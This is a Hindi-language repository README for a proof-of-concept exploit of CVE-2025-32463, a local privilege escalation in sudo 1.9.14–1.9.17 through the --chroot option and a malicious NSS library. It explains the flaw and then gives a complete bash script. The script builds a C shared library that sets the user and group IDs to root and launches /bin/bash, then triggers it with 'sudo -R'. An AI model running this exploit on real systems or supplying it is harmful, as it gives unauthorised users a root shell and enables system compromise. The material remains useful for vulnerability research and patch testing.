
CVE-2025-32463 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, sudo 1.9.14-1.9.17 में chroot गलत कॉन्फ़िगरेशन और दुर्भावनापूर्ण NSS लाइब्रेरी इंजेक्शन के माध्यम से स्थानीय विशेषाधिकार वृद्धि।
--chroot स्थानीय विशेषाधिकार वृद्धिExploitDB ID: 52352
यह रिपॉजिटरी एक महत्वपूर्ण स्थानीय विशेषाधिकार वृद्धि (LPE) कमजोरी का दस्तावेजीकरण करता है जो Sudo 1.9.14 – 1.9.17 संस्करणों को प्रभावित करती है।
कमजोरी sudo -R (--chroot) विकल्प के गलत कार्यान्वयन के कारण होती है और यह हमलावर को sudoers फ़ाइल में अनुमति न होने पर भी, रूट विशेषाधिकारों के साथ कमांड चलाने की अनुमति देती है।
🔥 परिणाम: अनधिकृत उपयोगकर्ता → रूट शेल
Sudo का --chroot (-R) पैरामीटर उपयोगकर्ता को अपने द्वारा निर्दिष्ट एक रूट निर्देशिका के अंतर्गत कमांड चलाने की अनुमति देता है।
हालांकि sudo 1.9.14 के साथ किए गए एक बदलाव के परिणामस्वरूप:
sudoers फ़ाइल अभी तक पूरी तरह से सत्यापित नहीं की गई हैchroot() कॉल उपयोगकर्ता द्वारा निर्दिष्ट निर्देशिका के माध्यम से की जाती हैयह स्थिति हमलावर को स्वयं द्वारा बनाई गई नकली:
/etc/nsswitch.conf
फ़ाइल के माध्यम से एक दुर्भावनापूर्ण NSS लाइब्रेरी (libnss_*.so) को रूट विशेषाधिकारों के साथ लोड करने का कारण बनता है।
nsswitch.conf तैयार किया जाता हैsudo -R <dir> <command> कॉल किया जाता है⚠️ केवल शिक्षा और परीक्षण वातावरण में उपयोग करें
#!/bin/bash
# sudo-chwoot.sh – PoC for CVE-2025-32463
set -e
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"
cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor))
void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash","/bin/bash",NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
sudo -R woot woot